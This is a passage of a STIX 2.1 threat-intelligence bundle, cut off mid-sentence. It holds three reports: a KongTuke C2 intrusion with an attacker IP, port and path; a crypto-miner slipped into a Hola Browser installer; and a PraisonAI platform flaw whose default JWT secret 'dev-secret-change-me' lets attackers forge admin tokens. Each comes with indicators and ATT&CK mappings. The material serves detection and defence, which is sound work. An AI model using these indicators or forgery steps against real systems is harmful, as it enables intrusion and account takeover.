      "spec_version": "2.1",
      "id": "relationship--cbf9c544-a1d9-55da-8b03-5b89182a366c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ecc667de-d420-55c8-9f0b-b9d022448871",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64d44725-02bf-504c-a2e0-1d59cbb31c50",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51612f5c-36d9-570f-9b7a-331e28e6d956",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1ddb42b9-64c4-5efa-bc37-6519ffaed029",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Dynamic Resolution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1568",
          "url": "https://attack.mitre.org/techniques/T1568"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2ef2fd1-1d2a-5f3c-9849-9af7efc1cdb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f355d9fb-1a92-5bbf-8536-3c756523b8c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dd52a030-b34e-5326-8b08-4c3fe785641a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stealthy KongTuke C2 Discovered via Multi-Domain Threat Hunting",
      "description": "## Overview\n\nRecent threat hunting operations by Cisco Talos identified a stealthy KongTuke C2 intrusion, demonstrating adversary techniques designed to evade traditional signature-based detections. This attack begins with initial access likely facilitated by a Traffic Direction System (TDS) redirect, which then leads to the execution of obfuscated PowerShell commands. These commands are typically Base64-encoded to bypass detection, responsible for downloading additional malicious scripts, such as `script.ps1`, into the user's `ApplicationData` directory. Following payload delivery, command-and-control (C2) communication is established, often leveraging living-off-the-land binaries like `curl.exe` to connect to suspicious external infrastructure, exemplified by `144.31.221.82` on port `6060` with a path like `/capcha9856`. The adversaries also employ anti-forensics measures, including post-execution file cleanup via `Remove-Item`, to obscure their tracks. This type of multi-stage attack, correlating network and endpoint telemetry, highlights the need for advanced threat hunting capabilities beyond simple alert thresholds.\n\n## Attack Chain\n\n1.  **Initial Access:** A user is redirected via a Traffic Direction System (TDS) infection, leading to a compromised website.\n2.  **Foothold/Network Connection:** Firewall telemetry records an outbound `ConnectionEvent` from an internal device to a suspicious IP address (e.g., `144.31.221.82`) on a non-standard port (`6060`) with a specific URL path (e.g., `/capcha9856`), indicating potential C2.\n3.  **Execution - Obfuscated PowerShell:** On the compromised host, `cmd.exe` spawns `powershell.exe` with an `-EncodedCommand` parameter containing a Base64-encoded payload to evade endpoint detection.\n4.  **Payload Delivery:** The decoded PowerShell script executes `Invoke-WebRequest` to fetch a second-stage payload, such as `script.ps1`, and drops it into the user's `ApplicationData` directory.\n5.  **C2 Communication:** A `curl.exe` process is initiated, making outbound requests to the same C2 infrastructure previously flagged by the firewall (e.g., `144.31.221.82:6060/capcha9856`), confirming active C2.\n6.  **Defense Evasion - Cleanup:** The attacker performs post-execution cleanup using `Remove-Item` to delete traces of the downloaded `script.ps1` and other artifacts from the user's `ApplicationData` directory.\n7.  **Impact:** Confirmed intrusion with C2 established, enabling data exfiltration, further compromise, or deployment of additional malware.\n\n## Impact\n\nThe observed KongTuke C2 activity represents a confirmed intrusion that, if unmitigated, allows adversaries to maintain persistent access and control over compromised systems. This type of breach enables capabilities ranging from data exfiltration, lateral movement within the network, to the deployment of additional malicious payloads such as ransomware or infostealers. While specific victim numbers are not provided, this methodology demonstrates how sophisticated adversaries can leverage a combination of living-off-the-land binaries, obfuscation, and targeted C2 to operate undetected, posing a significant risk to organizations across various sectors by bypassing traditional security controls.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules to your SIEM and tune them for your environment to detect encoded PowerShell, suspicious `Invoke-WebRequest` activity, and `curl.exe` C2 connections.\n*   Enable Sysmon process-creation logging to capture `powershell.exe` and `curl.exe` command lines and `network_connection` events for comprehensive visibility.\n*   Block the C2 IP address `144.31.221.82` and URL `http://144.31.221.82:6060/capcha9856` at your network perimeter firewalls and DNS resolvers.\n*   Regularly review network connection logs for outbound connections from unexpected processes (e.g., `curl.exe`) or connections to known malicious autonomous systems (ASNs).\n",
      "published": "2026-06-14T09:40:20Z",
      "labels": [
        "command-and-control",
        "defense-evasion",
        "execution",
        "powershell",
        "lolbins",
        "threat-hunting"
      ],
      "object_refs": [
        "indicator--b9e24b81-3b75-5dc8-b45f-19a368ce3daa",
        "indicator--81773f6f-f65e-52cf-b66f-0c22d732fee6",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--c2b690d8-4f77-5197-9bb3-2ef39b55fea6",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://blog.talosintelligence.com/hypotheses-telemetry-and-human-judgment-inside-cisco-talos-threat-hunting/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7ef68982-e68e-5dc6-9683-7b59ac77823e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_sha256: e3541caf708c075f0bb22fc68b03acd8457fea7cf0732ea935b1eb016d1c7721",
      "pattern": "[file:hashes.'SHA-256' = 'e3541caf708c075f0bb22fc68b03acd8457fea7cf0732ea935b1eb016d1c7721']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:42:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--08807feb-aee2-55f6-b925-04e085787392",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "indicator--7ef68982-e68e-5dc6-9683-7b59ac77823e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3ef53fc3-adc1-5cc0-ac4d-bfe3b30d8257",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: C:\\Program Files\\Hola\\me.exe",
      "pattern": "[x-ti-bot:file_path = 'C:\\Program Files\\Hola\\me.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:42:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51ae9c5e-0135-56ea-8ca7-6a69c5125810",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "indicator--3ef53fc3-adc1-5cc0-ac4d-bfe3b30d8257"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5859cab-8d0c-5540-a853-8270bbe50e04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: C:\\Program Files\\Hola\\HolaMonitorService.exe",
      "pattern": "[x-ti-bot:file_path = 'C:\\Program Files\\Hola\\HolaMonitorService.exe']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:42:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--95c863b4-d2d9-5c62-8655-3763a27e0801",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "indicator--e5859cab-8d0c-5540-a853-8270bbe50e04"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--333badae-51e6-5098-bf14-8ed81a3b5a79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "service_name: hola_monitor_svc",
      "pattern": "[x-ti-bot:service_name = 'hola_monitor_svc']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:42:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5367e306-7cfc-5113-b6cc-f822b6b622be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "indicator--333badae-51e6-5098-bf14-8ed81a3b5a79"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1195",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c730144-27e9-5aa7-944c-d7d5263de1e3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af75c23f-ef67-5573-bf52-439021694fd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1543",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cfe3745-5935-5e47-86e2-37f1b65ca8fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1562",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c82ca49-4240-5269-9fdd-fe9a7c3b39f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Resource Hijacking",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1496",
          "url": "https://attack.mitre.org/techniques/T1496"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17bb2fef-7482-50af-ba9f-291527cf6a1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "target_ref": "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e517ae26-849e-5843-b4fd-a782698cfb30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "You do surprise me.exe: Unexpected Crypto-Miner in Hola Browser",
      "description": "## Overview\n\nSophos X-Ops recently uncovered a supply chain compromise affecting Hola Browser (version 1.251.91.0) during an AppEsteem certification test. An undeclared and unsigned executable, `me.exe`, was found bundled with the browser installer and subsequently dropped to `C:\\Program Files\\Hola\\`. Analysis revealed `me.exe` to be a crypto-miner, identified by Sophos as Troj/GoMiner-B, which included characteristics such as obfuscated code and memory-write capabilities. This compromise, affecting approximately 0.1% of Hola Browser users, was attributed to anomalous activity within Hola's update distribution pipeline. Hola has since rectified the issue, rebuilt its pipeline, and implemented enhanced security measures to prevent future occurrences, with an independent forensic investigation corroborating the supply chain compromise.\n\n## Attack Chain\n\n1.  **Initial Access / Delivery**: Users download Hola Browser version 1.251.91.0, which, due to a supply chain compromise in Hola's distribution pipeline, includes the undeclared crypto-miner `me.exe`.\n2.  **Execution**: During the browser installation or initial launch, `me.exe` is dropped onto the system, typically in `C:\\Program Files\\Hola\\`.\n3.  **Persistence Setup**: `me.exe` copies itself to `C:\\Program Files\\Hola\\HolaMonitorService.exe` to masquerade as a legitimate component.\n4.  **Persistence / Service Creation**: The `HolaMonitorService.exe` binary creates a new Windows service named `hola_monitor_svc`, configured to automatically start and execute when the host is idle.\n5.  **Defense Evasion**: The crypto-miner performs actions to create exclusions for itself within Windows Defender, aiming to prevent detection and termination.\n6.  **Resource Hijacking**: Once persistent and active, the `hola_monitor_svc` service (running `HolaMonitorService.exe`), an XMRig-based crypto-miner, begins mining cryptocurrency during periods of system idleness.\n7.  **Impact**: The crypto-mining activity consumes significant CPU and GPU resources, leading to degraded system performance, increased power consumption, and potentially reduced hardware lifespan for the victim.\n\n## Impact\n\nThe primary impact of this compromise was resource hijacking on affected user systems. The `me.exe` crypto-miner, identified as Troj/GoMiner-B, consumed CPU and GPU resources to mine cryptocurrency, leading to severe degradation in system performance, increased electricity consumption, and potential hardware wear-and-tear for the estimated 0.1% of affected users. Beyond direct system performance, the supply chain compromise eroded user trust in a widely used application and highlighted the risks inherent in software distribution channels. Although Hola reported no user data was accessed or exfiltrated, the presence of an unauthorized executable posed a significant security risk, allowing an attacker to run arbitrary code on user machines.\n\n## Recommendation\n\n*   Deploy the Sigma rules provided in this brief to your SIEM for detection of `me.exe` execution, `HolaMonitorService.exe` creation, and `hola_monitor_svc` service registration.\n*   Enable Sysmon event logging for `process_creation` (Event ID 1), `file_creation` (Event ID 11), and `registry_set` (Event ID 13) to ensure telemetry for the rules in this brief.\n*   Review systems for the presence of `me.exe` (SHA256: `e3541caf708c075f0bb22fc68b03acd8457fea7cf0732ea935b1eb016d1c7721`) or `HolaMonitorService.exe` in `C:\\Program Files\\Hola\\`.\n*   Ensure Hola Browser installations are updated to versions released after the fix to prevent exposure to the compromised distribution pipeline.\n",
      "published": "2026-06-14T09:42:17Z",
      "labels": [
        "supply-chain-compromise",
        "cryptomining",
        "pua",
        "windows",
        "executable"
      ],
      "object_refs": [
        "indicator--7ef68982-e68e-5dc6-9683-7b59ac77823e",
        "indicator--3ef53fc3-adc1-5cc0-ac4d-bfe3b30d8257",
        "indicator--e5859cab-8d0c-5540-a853-8270bbe50e04",
        "indicator--333badae-51e6-5098-bf14-8ed81a3b5a79",
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--2abc160d-3dcc-5d32-b005-58ec7b18bb46"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sophos.com/en-us/blog/you-do-surprise-me-exe-an-unexpected-executable-in-hola-browser"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0fbed093-c73a-5ad1-8f1d-817660f2cdaf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/MervinPraison/PraisonAI",
      "pattern": "[url:value = 'https://github.com/MervinPraison/PraisonAI']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:43:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24e35f3c-6e5b-511c-b4f0-8c10203f22b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "indicator--0fbed093-c73a-5ad1-8f1d-817660f2cdaf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0980c1e6-1afa-5e92-9516-433c8d739af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_sha256: cc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258",
      "pattern": "[file:hashes.'SHA-256' = 'cc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:43:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc0dd9a8-cc95-5c9e-b64f-82e4d0d352b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "indicator--0980c1e6-1afa-5e92-9516-433c8d739af7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9bf6744a-63fd-5b13-ba5a-725d15aa9452",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "string: dev-secret-change-me",
      "pattern": "[x-ti-bot:string = 'dev-secret-change-me']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T14:43:44Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ffbe88c-6276-5636-8a0d-532cc5657c47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "indicator--9bf6744a-63fd-5b13-ba5a-725d15aa9452"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--39a3cd0e-d602-58db-ad7b-c8b81254234c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51a8eaf4-140a-575e-9e0d-75fa888afd96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd62007a-027e-5182-89dd-33a10afb4ab2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e06e0b7-72c1-5765-9fe2-208018afaf46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--085285a2-7da4-5d60-8802-509d3a407339",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PraisonAI Platform Vulnerable to JWT Forgery via Hardcoded Default Secret",
      "description": "## Overview\n\nThe `praisonai-platform` Python package, specifically versions 0.1.4 and older, developed by Mervin Praison, contains a critical vulnerability where its JSON Web Token (JWT) signing secret defaults to a publicly known string, `dev-secret-change-me`. This misconfiguration stems from a flawed environment variable check in `praisonai_platform/services/auth_service.py` (SHA256: `cc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258`). The intended guard to prevent production deployments with the default secret fails if both `PLATFORM_JWT_SECRET` and `PLATFORM_ENV` are left unset, causing the application to silently start with the insecure secret. This enables unauthenticated attackers to forge arbitrary JWTs, effectively bypassing authentication for any user, including administrative accounts, across all routes protected by the `get_current_user` dependency.\n\n## Attack Chain\n\n1.  **Initial Access / Reconnaissance**: An unauthenticated attacker identifies a `praisonai-platform` instance, possibly by interacting with its API endpoints or discovering the underlying software version.\n2.  **Vulnerability Identification**: The attacker identifies that the application is running `praisonai-platform` version 0.1.4 or earlier and has not correctly configured its `PLATFORM_JWT_SECRET` and `PLATFORM_ENV` environment variables, leading to the use of the default `dev-secret-change-me` JWT secret.\n3.  **Token Forgery**: Using the publicly known JWT secret (`dev-secret-change-me`) and the HS256 algorithm, the attacker crafts a JWT with arbitrary claims, including `sub` (user ID) and `email`, for a target user (e.g., an administrative user like `admin@example.com` or a known user ID).\n4.  **Authentication Bypass**: The attacker sends the forged JWT in an `Authorization` header to a protected endpoint (e.g., `/api/v1/workspaces`, `/api/v1/projects`).\n5.  **User Impersonation**: The `praisonai-platform` server validates the forged token using the default secret and treats the attacker as the impersonated user (e.g., `admin-user-id-attacker-chose`).\n6.  **Privilege Escalation / Unauthorized Access**: If the forged token impersonates an administrator or a member of a specific workspace, the attacker gains full access to that user's resources and permissions within the application, including creating, modifying, or deleting data.\n7.  **Impact**: The attacker proceeds to exfiltrate data, tamper with application settings, or perform other malicious actions as the impersonated user.\n\n## Impact\n\nThis critical vulnerability directly leads to complete authentication bypass and privilege escalation within affected `praisonai-platform` deployments. An attacker can impersonate any user, including administrators, by forging JWTs with arbitrary user IDs and email addresses. All routes protected by the `get_current_user` dependency, which includes core functionalities such as managing workspaces, projects, issues, agents, and labels, become vulnerable to unauthorized access. The consequence is full compromise of the application's data and functionality, with potential for sensitive data exfiltration, system configuration changes, and disruption of service. There is no specific victim count, but any instance of `praisonai-platform` running the vulnerable versions without proper environment configuration is at risk.\n\n## Recommendation\n\n*   **Immediate Action**: Patch `praisonai-platform` to a version that addresses this vulnerability or ensure `PLATFORM_JWT_SECRET` is set to a strong, random, and unique value (at least 32 bytes) in all environments, including development. Set `PLATFORM_ENV` to a non-`dev` value (e.g., `production`) for production deployments to ensure the built-in guard is active.\n*   **Detection Engineering**: Deploy the provided Sigma rule \"Detect PraisonAI Platform Vulnerable File (SHA256)\" to identify instances running the vulnerable `auth_service.py` file.\n*   **Supply Chain Security**: Implement automated scanning for component vulnerabilities (SCA) to identify the presence of `praisonai-platform \u003c= 